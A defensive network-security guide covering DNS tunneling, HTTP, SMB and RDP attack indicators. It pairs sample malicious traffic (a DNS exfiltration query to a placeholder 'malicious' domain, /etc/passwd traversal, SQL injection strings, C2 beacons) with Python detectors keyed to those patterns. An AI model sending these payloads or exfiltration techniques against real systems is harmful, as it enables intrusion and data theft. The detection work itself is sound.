🌐 Network Protocols Deep Dive

A detailed analysis of network protocols and their vulnerabilities

🔍 DNS Tunneling Detection

Detecting covert channels over DNS
Attack Vectors
DNS Data Exfiltration
Data theft through DNS queries by encoding it into the subdomain
DNS C2 Channel
Command & Control communication over TXT records
DNS Cache Poisoning
Spoofing DNS responses to redirect traffic
🛡️ Detection Methods
Anomaly Detection
Unusually long DNS names, high entropy in queries
Volume Analysis
A large number of DNS queries to a single domain
Pattern Matching
Base64/Hex-encoded data in DNS queries
DNS Tunneling Example:
Query: ZXhhbXBsZS1kYXRhLWV4ZmlsdHJhdGlvbg==.tunnel.malicious.com
Type: TXT
Response: "COMMAND:download|TARGET:sensitive.db|KEY:aGFja2Vy"
Decoded: example-data-exfiltration → COMMAND execution
🔎 Indicators of Compromise
  • DNS queries with a subdomain longer than 50 characters
  • High frequency of queries to new subdomains
  • DNS responses with unusually large TXT records
  • Queries to domains with high entropy
  • Non-cached DNS queries in large volumes
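As an added worked example (not code from the original page), the following Python script applies the detection methods and indicators above to a constructed DNS query log: subdomain length, Shannon entropy, base64-shaped labels, and bursts of distinct subdomains under one parent domain. The log format, the thresholds and the sample lines are assumptions; the first tunnel label is the page's own example query with its base64 padding removed, because "=" is not a legal hostname character.

```python
import base64
import binascii
import math
import re
from collections import Counter, defaultdict

# Constructed DNS query log, one query per line: "<unix_ts> <client_ip> <qname> <qtype>".
# The format is an assumption for this example; real resolvers log differently.
# The first tunnel label is the page's example query with its '==' padding dropped
# ('=' cannot appear in a hostname, so real tunnels strip it too).
SAMPLE_LOG = """\
1700000000 10.0.0.5 www.example.com A
1700000001 10.0.0.5 ZXhhbXBsZS1kYXRhLWV4ZmlsdHJhdGlvbg.tunnel.malicious.com TXT
1700000002 10.0.0.5 YW5vdGhlci1jaHVuay1vZi1kYXRhc2Vuc2l0aXZlLmRiLWNvbnRlbnRz.tunnel.malicious.com TXT
1700000003 10.0.0.5 c2Vuc2l0aXZlLmRiLWNvbnRlbnRz.tunnel.malicious.com TXT
1700000004 10.0.0.7 mail.example.com MX
"""

# Hostname-safe base64 alphabet (the standard '+' and '/' cannot appear in a label).
BASE64_LABEL = re.compile(r"^[A-Za-z0-9_-]{16,}$")


def shannon_entropy(text: str) -> float:
    """Bits per character; encoded or encrypted data scores high, real words score low."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_base64(label: str) -> bool:
    """True if a label is long, uses only base64 characters, mixes case and decodes cleanly."""
    if not BASE64_LABEL.match(label):
        return False
    if not (any(c.isupper() for c in label) and any(c.islower() for c in label)):
        return False
    standard = label.replace("-", "+").replace("_", "/")
    standard += "=" * (-len(label) % 4)  # restore the padding a tunnel would have stripped
    try:
        base64.b64decode(standard, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def analyze_dns_log(log_text: str, max_subdomain_len: int = 50,
                    entropy_threshold: float = 3.5, burst_threshold: int = 3) -> dict:
    """Map each suspicious qname (or parent domain) to the indicators it triggered."""
    findings = defaultdict(list)
    subdomains_seen = defaultdict(set)  # parent domain -> distinct subdomains queried

    def flag(key, reason):
        if reason not in findings[key]:
            findings[key].append(reason)

    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # malformed line; count these separately in production
        _ts, _client, qname, _qtype = parts
        labels = qname.rstrip(".").split(".")
        if len(labels) < 3:
            continue  # bare domain, nothing to inspect
        # Assumption: the registrable domain is the last two labels (use a public
        # suffix list for real traffic, e.g. "co.uk" needs three).
        domain = ".".join(labels[-2:])
        subdomain = ".".join(labels[:-2])
        subdomains_seen[domain].add(subdomain)
        if len(subdomain) > max_subdomain_len:
            flag(qname, "subdomain longer than %d chars" % max_subdomain_len)
        if shannon_entropy(subdomain) > entropy_threshold:
            flag(qname, "high-entropy subdomain")
        if any(looks_base64(label) for label in labels[:-2]):
            flag(qname, "base64-like label")

    for domain, subs in subdomains_seen.items():
        if len(subs) >= burst_threshold:
            flag(domain, "%d distinct subdomains queried" % len(subs))
    return dict(findings)


if __name__ == "__main__":
    for name, reasons in analyze_dns_log(SAMPLE_LOG).items():
        print(name, "->", ", ".join(reasons))
```

The entropy threshold of 3.5 bits per character separates dictionary-word hostnames (typically below 3) from base64 or hex payloads (above 4); tune it against your own resolver logs, since CDN and cloud hostnames with random labels will also score high and need an allow-list.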
🛡️ Mitigation Strategies
  • Implement DNS filtering and reputation-based blocking
  • Monitor DNS query length and frequency thresholds
  • Use DNS sinkholes for known malicious domains
  • Enable DNSSEC to prevent cache poisoning
  • Analyze DNS logs with SIEM correlation rules
🌐 HTTP/HTTPS Analysis

Analysis of web traffic and detection of anomalies
🎯 Common Attacks
SQL Injection
Injection of SQL code through HTTP parameters
XSS (Cross-Site Scripting)
Injection of JavaScript into web pages
Command Injection
Execution of operating system commands through the web application
🔍 Analysis Points
  • User-Agent anomalies (tools, bots, scanners)
  • Unusual HTTP methods (PUT, DELETE, TRACE)
  • Large POST requests to unexpected endpoints
  • Missing or malformed headers
  • Suspicious URL patterns and encoding
Suspicious HTTP Request:
GET /admin/config.php?file=../../etc/passwd HTTP/1.1
Host: vulnerable.site.com
User-Agent: sqlmap/1.4.7#stable (http://sqlmap.org)
Cookie: session=admin' OR '1'='1
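As an added example (not from the original page), here is a Python checker that applies the analysis points above to constructed lines in Apache/Nginx combined log format: unusual methods, scanner user agents, path traversal and SQL injection patterns in the decoded URL. The log lines, the pattern lists and the scanner list are assumptions; two of the lines mirror the page's own suspicious request and SQL injection examples. Note that request headers such as the Cookie in the request above are not part of a standard access log, so inspecting them requires WAF or reverse-proxy logs.

```python
import re
from urllib.parse import unquote_plus

# Constructed access log in Apache/Nginx "combined" format. Clients, hosts, paths
# and user agents are made up for this example; lines 2 and 3 mirror the page's
# suspicious request and SQL injection examples.
SAMPLE_ACCESS_LOG = r'''10.0.0.9 - - [12/Mar/2024:10:15:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/123.0"
10.0.0.23 - - [12/Mar/2024:10:15:02 +0000] "GET /admin/config.php?file=../../etc/passwd HTTP/1.1" 404 0 "-" "sqlmap/1.4.7#stable (http://sqlmap.org)"
10.0.0.23 - - [12/Mar/2024:10:15:03 +0000] "GET /products.php?id=1%27%20UNION%20SELECT%20username,password%20FROM%20users-- HTTP/1.1" 200 2048 "http://evil-scanner.com/sqli-test" "sqlmap/1.4.7#stable (http://sqlmap.org)"
10.0.0.31 - - [12/Mar/2024:10:15:04 +0000] "TRACE / HTTP/1.1" 405 0 "-" "curl/8.4.0"
'''

COMBINED = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>\S+)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

UNUSUAL_METHODS = {"PUT", "DELETE", "TRACE"}  # the methods listed on the page
# Well-known tool strings (assumed list); extend it from your own WAF/IDS signatures.
SCANNER_UA = re.compile(r"sqlmap|nikto|nmap|masscan|dirbuster|gobuster|python-requests", re.I)
TRAVERSAL = re.compile(r"\.\./|/etc/passwd|\\\.\.\\")
SQLI = re.compile(r"union\s+select|'\s*or\s+'?\d|\bsleep\(|\bbenchmark\(", re.I)


def inspect_request(method: str, raw_path: str, user_agent: str) -> list:
    """Return the list of indicators one request line triggers (empty if none)."""
    reasons = []
    # Decode twice so double-encoded payloads (%2527 -> %27 -> ') are still caught.
    decoded = unquote_plus(unquote_plus(raw_path))
    if method.upper() in UNUSUAL_METHODS:
        reasons.append("unusual method " + method.upper())
    if SCANNER_UA.search(user_agent):
        reasons.append("scanner user-agent")
    if TRAVERSAL.search(decoded):
        reasons.append("path traversal")
    if SQLI.search(decoded):
        reasons.append("sql injection pattern")
    return reasons


def scan_access_log(log_text: str) -> list:
    """Parse combined-format lines and keep only those that trigger an indicator."""
    findings = []
    for line in log_text.splitlines():
        m = COMBINED.match(line)
        if not m:
            continue  # unparseable line; in production count these as well
        reasons = inspect_request(m["method"], m["path"], m["ua"])
        if reasons:
            findings.append({"client": m["client"], "path": m["path"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f["client"], f["path"], "->", ", ".join(f["reasons"]))
```

Decoding the URL before matching matters more than the pattern list itself: most evasion of naive log greps is just percent-encoding or double-encoding of the payload, which is why the decode is applied twice here.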
🛠️ Detection Tools
ModSecurity, OWASP CRS, Suricata, Zeek, WAF logs
📊 SSL/TLS Analysis
  • Self-signed certificates
  • Expired or mismatched certificates
  • Weak cipher suites (RC4, DES)
  • SSL/TLS version downgrades
  • Certificate pinning violations
🗂️ SMB Protocol Attacks

Server Message Block vulnerabilities and exploits
💀 Critical Vulnerabilities
EternalBlue (MS17-010)
Remote code execution via SMBv1, used by WannaCry
SMBGhost (CVE-2020-0796)
Buffer overflow in SMBv3 compression
Pass-the-Hash
Using NTLM hashes for authentication
🚨 Attack Indicators
  • SMBv1 traffic on port 445
  • Mass scanning of port 445
  • Unusual SMB tree connects
  • Large data transfers via SMB
  • SMB relay attack patterns
SMB Attack Pattern:
Source: 192.168.1.100:49285 → Dest: 192.168.1.50:445
SMB Protocol: Negotiate Protocol Request (SMBv1)
Tree Connect: \\TARGET\IPC$
Named Pipe: \pipe\browser
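An added example (not part of the page) showing how the attack indicators above can be checked against connection records: Python over a constructed tab-separated export with one row per TCP connection plus the SMB dialect the server accepted. The column layout, the list of SMB1 dialect strings, the sample rows and the thresholds are assumptions for this example; the first row mirrors the page's attack pattern.

```python
import csv
import io
from collections import defaultdict

# Constructed connection records in a hypothetical TSV export (the column layout is an
# assumption, not any specific tool's schema). "dialect" is the SMB dialect the server
# accepted, or "-" when the connection was refused or nothing was negotiated.
HEADER = "ts\tsrc\tsport\tdst\tdport\tbytes\tdialect"
ROWS = [
    "1700000000\t192.168.1.100\t49285\t192.168.1.50\t445\t1200\tNT LM 0.12",  # page's pattern
    "1700000005\t192.168.1.20\t50001\t192.168.1.50\t445\t987654321\t3.1.1",  # ~940 MB copy
    "1700000010\t192.168.1.21\t50002\t192.168.1.50\t445\t4096\t3.1.1",       # normal use
]
# The first client then touches twelve further hosts on 445 within seconds (a sweep).
ROWS += ["17000000%02d\t192.168.1.100\t%d\t192.168.1.%d\t445\t0\t-" % (20 + i, 49300 + i, 60 + i)
         for i in range(12)]
SAMPLE_FLOWS = "\n".join([HEADER] + ROWS) + "\n"

# SMB1 dialect strings (non-exhaustive); any of these being negotiated means the
# server still has SMBv1 enabled, which the hardening list below says to disable.
SMBV1_DIALECTS = {"PC NETWORK PROGRAM 1.0", "LANMAN1.0", "LM1.2X002", "LANMAN2.1", "NT LM 0.12"}


def analyze_smb_flows(tsv_text: str, scan_threshold: int = 10, window_seconds: int = 60,
                      bulk_bytes: int = 500_000_000) -> list:
    """Return (indicator, source, detail) tuples for SMBv1 use, bulk transfers and 445 sweeps."""
    findings = []
    per_source = defaultdict(list)  # src -> [(ts, dst)] for port-445 connections only
    for row in csv.DictReader(io.StringIO(tsv_text), delimiter="\t"):
        if int(row["dport"]) != 445:
            continue
        per_source[row["src"]].append((int(row["ts"]), row["dst"]))
        if row["dialect"] in SMBV1_DIALECTS:
            findings.append(("smbv1-negotiated", row["src"], row["dst"]))
        if int(row["bytes"]) >= bulk_bytes:
            findings.append(("bulk-transfer", row["src"], row["dst"]))
    for src, hits in per_source.items():
        hits.sort()
        most = 0
        start = 0
        for end in range(len(hits)):  # sliding time window over this source's connections
            while hits[end][0] - hits[start][0] > window_seconds:
                start += 1
            most = max(most, len({dst for _, dst in hits[start:end + 1]}))
        if most >= scan_threshold:
            findings.append(("port-445-sweep", src, "%d hosts within %ds" % (most, window_seconds)))
    return findings


if __name__ == "__main__":
    for finding in analyze_smb_flows(SAMPLE_FLOWS):
        print(*finding)
```

Counting distinct destinations inside a sliding window rather than raw connection counts is what separates a sweep from a busy file client that opens many sessions to the same server.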
🔒 SMB Security Hardening
  • Disable SMBv1 on all systems
  • Enable SMB signing and encryption
  • Restrict SMB traffic at network boundaries
  • Monitor for pass-the-hash indicators
  • Implement network segmentation for file shares
  • Regular patching for SMB vulnerabilities
🖥️ RDP Security

Remote Desktop Protocol protection and monitoring
⚠️ Common RDP Attacks
BlueKeep (CVE-2019-0708)
Wormable RCE vulnerability in RDP
RDP Brute Force
Password attacks against exposed RDP
Man-in-the-Middle
RDP session hijacking and interception
📡 Detection Patterns
Failed Login Monitoring
Event ID 4625 with Logon Type 10
Unusual Source IPs
RDP from foreign countries or VPS providers
Off-hours Access
RDP sessions outside business hours
RDP Connection Analysis:
Protocol: MS-RDP (Port 3389)
X.224 Connection Request: Cookie: mstshash=administrator
Encryption: RC4 128-bit (Weak!)
Client Name: DESKTOP-MALWARE
🔐 Security Best Practices
  • Enable Network Level Authentication (NLA)
  • Use RD Gateway for internet access
  • Implement MFA for RDP access
  • Restrict RDP to specific IP ranges
  • Monitor and alert on RDP usage
  • Regular security updates
📊 Monitoring Metrics
  • Failed RDP authentications per hour
  • Successful RDP from new sources
  • RDP session duration anomalies
  • Concurrent RDP sessions per user
  • RDP traffic volume spikes
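The detection patterns and monitoring metrics above (failed logons with Event ID 4625 and Logon Type 10, successes from new sources, off-hours sessions), as an added Python example over constructed Windows Security events; this is not code from the page. The field names follow the real events, but the events, the addresses, the baseline of known client addresses and the thresholds are all made up for the example.

```python
from collections import defaultdict
from datetime import datetime, timezone

# Constructed Windows Security events as a SIEM might export them. The field names
# follow the real events (4625 = failed logon, 4624 = successful logon, LogonType 10 =
# RemoteInteractive, i.e. RDP); the events, addresses and users are made up.
SAMPLE_EVENTS = [
    {"TimeCreated": "2024-03-12T02:%02d:%02dZ" % (10 + i * 10 // 60, i * 10 % 60),
     "EventID": 4625, "LogonType": 10, "IpAddress": "203.0.113.77",
     "TargetUserName": "administrator"}
    for i in range(25)  # 25 failures in four minutes from one internet host
] + [
    {"TimeCreated": "2024-03-12T02:16:00Z", "EventID": 4624, "LogonType": 10,
     "IpAddress": "203.0.113.77", "TargetUserName": "administrator"},  # ...then a success
    {"TimeCreated": "2024-03-12T09:30:00Z", "EventID": 4624, "LogonType": 10,
     "IpAddress": "10.0.0.15", "TargetUserName": "jdoe"},              # normal daytime use
    {"TimeCreated": "2024-03-12T10:00:00Z", "EventID": 4625, "LogonType": 2,
     "IpAddress": "-", "TargetUserName": "jdoe"},                      # console typo, not RDP
    {"TimeCreated": "2024-03-12T21:00:00Z", "EventID": 4624, "LogonType": 10,
     "IpAddress": "10.0.0.15", "TargetUserName": "jdoe"},              # known host, off hours
]
KNOWN_RDP_SOURCES = {"10.0.0.15"}  # assumption: baseline of expected RDP client addresses


def parse_ts(value: str) -> datetime:
    """Parse the ISO-8601 UTC timestamp used in the constructed export."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def analyze_rdp_events(events: list, known_sources: set, fail_threshold: int = 20,
                       business_hours: tuple = (8, 18)) -> list:
    """Return (indicator, source_ip, detail) tuples for the RDP detection patterns."""
    findings = []
    failures = defaultdict(int)  # (ip, hour bucket) -> failed RDP logons
    brute_forcers = set()
    for e in sorted(events, key=lambda ev: ev["TimeCreated"]):
        if e.get("LogonType") != 10:
            continue  # only RemoteInteractive logons are RDP
        ts = parse_ts(e["TimeCreated"])
        ip = e["IpAddress"]
        if e["EventID"] == 4625:
            bucket = (ip, ts.replace(minute=0, second=0, microsecond=0))
            failures[bucket] += 1
            if failures[bucket] == fail_threshold:  # fire once per source and hour
                findings.append(("brute-force", ip, "%d failures within the hour" % fail_threshold))
                brute_forcers.add(ip)
        elif e["EventID"] == 4624:
            user = e["TargetUserName"]
            if ip in brute_forcers:
                findings.append(("success-after-failures", ip, user))
            if ip not in known_sources:
                findings.append(("new-source-success", ip, user))
            if not business_hours[0] <= ts.hour < business_hours[1]:
                findings.append(("off-hours-session", ip, user))
    return findings


if __name__ == "__main__":
    for finding in analyze_rdp_events(SAMPLE_EVENTS, KNOWN_RDP_SOURCES):
        print(*finding)
```

The "success-after-failures" indicator is the one worth paging on: a burst of 4625 events followed by a 4624 from the same address is the signature of a guessed password, whereas the burst alone is background noise on any internet-exposed RDP host.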
📦 Packet Analysis Examples

Practical examples of network packet analysis
🎣 Phishing C2 Communication:
GET /api/bot/check-in?id=VICTIM-PC-001&status=ready HTTP/1.1
Host: updates-microsoft[.]tk
User-Agent: Mozilla/5.0 (Botnet v2.1)
X-Custom-Header: BASE64_ENCODED_SYSTEM_INFO
🦠 Malware Beacon:
POST /jquery/script.js HTTP/1.1
Host: 185.174.137[.]22
Content-Type: application/octet-stream
Cookie: SESSION=0x4D5A9000 (MZ header!)
Data: [Encrypted payload - 4096 bytes]
💉 SQL Injection Attempt:
GET /products.php?id=1' UNION SELECT username,password FROM users--
Host: vulnerable-shop.com
Referer: http://evil-scanner.com/sqli-test
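An added Python example (not the page's own code) that turns the malware beacon example above into detection logic: it scores request timing per destination for periodicity, flags an application/octet-stream body sent to a .js path, and decodes hex cookie values to spot the MZ (DOS/PE) magic. The request records, the benign host and the thresholds are constructed for this example; the beacon host is the page's own defanged address.

```python
import statistics
from collections import defaultdict

# Constructed request records: seconds since capture start, destination host, path,
# Content-Type and Cookie. The first host is the page's own defanged beacon example;
# the timings, the benign host and all other values are made up for this example.
BEACON_HOST = "185.174.137[.]22"
SAMPLE_REQUESTS = [
    {"ts": t, "host": BEACON_HOST, "path": "/jquery/script.js",
     "content_type": "application/octet-stream", "cookie": "SESSION=0x4D5A9000"}
    for t in (0, 61, 119, 181, 240, 299, 361, 420)   # ~60 s apart with small jitter
] + [
    {"ts": t, "host": "cdn.example.com", "path": "/jquery/script.js",
     "content_type": "application/javascript", "cookie": ""}
    for t in (5, 7, 30, 200, 201, 202, 350, 900)     # bursty, human-driven timing
]


def mz_in_cookie(cookie_header: str) -> bool:
    """True if any cookie value is hex data beginning with the 'MZ' DOS/PE magic."""
    for part in cookie_header.split(";"):
        _name, _sep, value = part.strip().partition("=")
        value = value.strip()
        if value[:2].lower() == "0x":
            value = value[2:]
        is_hex = (len(value) >= 4 and len(value) % 2 == 0
                  and all(c in "0123456789abcdefABCDEF" for c in value))
        if is_hex and bytes.fromhex(value).startswith(b"MZ"):
            return True
    return False


def beacon_score(timestamps, min_samples: int = 6):
    """Mean gap and coefficient of variation of inter-request gaps; None if too few samples."""
    if len(timestamps) < min_samples:
        return None
    ts = sorted(timestamps)
    gaps = [later - earlier for earlier, later in zip(ts, ts[1:])]
    mean = statistics.mean(gaps)
    if mean <= 0:
        return None
    return mean, statistics.pstdev(gaps) / mean


def find_beacons(requests: list, max_cv: float = 0.1, min_samples: int = 6) -> list:
    """Return (host, reason) pairs; a low coefficient of variation means machine-like timing."""
    findings = []
    by_host = defaultdict(list)

    def flag(host, reason):
        if (host, reason) not in findings:
            findings.append((host, reason))

    for r in requests:
        by_host[r["host"]].append(r["ts"])
        if r["path"].endswith(".js") and r["content_type"] == "application/octet-stream":
            flag(r["host"], "octet-stream body sent to a .js path")
        if mz_in_cookie(r.get("cookie", "")):
            flag(r["host"], "PE/DOS 'MZ' header inside a cookie value")
    for host, stamps in by_host.items():
        score = beacon_score(stamps, min_samples)
        if score is not None and score[1] <= max_cv:
            flag(host, "periodic requests every ~%.0fs (cv=%.3f)" % score)
    return findings


if __name__ == "__main__":
    for host, reason in find_beacons(SAMPLE_REQUESTS):
        print(host, "->", reason)
```

The coefficient of variation (standard deviation divided by the mean gap) is used instead of the raw standard deviation so that the same threshold works for a 60-second and a 60-minute beacon; implants that add random sleep jitter raise it, which is why the threshold should be set from observed benign traffic rather than fixed at 0.1.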
🛠️ Analysis Tools
Wireshark, tcpdump, NetworkMiner, Zeek (Bro), tshark, ngrep
📚 Key Analysis Skills
  • Protocol structure understanding
  • Baseline vs anomaly recognition
  • Encryption/encoding detection
  • Timing analysis capabilities
  • Tool proficiency